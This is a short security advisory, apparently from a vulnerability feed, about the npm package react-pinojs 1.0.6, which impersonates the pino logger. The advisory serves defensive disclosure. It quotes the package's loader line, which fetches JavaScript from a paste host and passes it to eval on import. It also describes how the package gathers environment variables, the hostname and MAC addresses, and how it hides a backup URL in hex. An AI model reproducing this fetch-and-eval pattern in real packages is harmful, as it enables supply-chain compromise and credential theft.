react-pinojs @1.0.6

Summary

Package impersonates the popular pino logger (homepage points to getpino.io, description mimics pino's tagline) and executes a remote-code-execution dropper on import. lib/writer.js — loaded transitively by the main entry pino.js — performs require('axios').get('https://www.jsonkeeper.com/b/MYUKZ').then(r => { eval(r.data.content_o); }), passing arbitrary attacker-controlled JavaScript fetched from an anonymous, mutable paste host directly to eval at module load time. Before the eval fires, writer.js assembles a data object containing the full process.env, os.platform(), os.hostname(), os.userInfo().username, and non-internal MAC addresses, which is in scope for the eval'd payload. A second hex-encoded channel is hidden in writer.js: byte arrays decode to the strings 'axios', 'get', 'then', and the URL https://www.jsonkeeper.com/b/HY6M6 — a backup fetch endpoint concealed from trivial source greps. Any project that runs require('react-pinojs') (or imports it) executes attacker-controlled code with access to the installer's environment variables, hostname, username, and MAC addresses.

Source: amazon-inspector (db767edd3581eec08793cb669f0ec59351e61f31501b6d4287b86baea512bb63)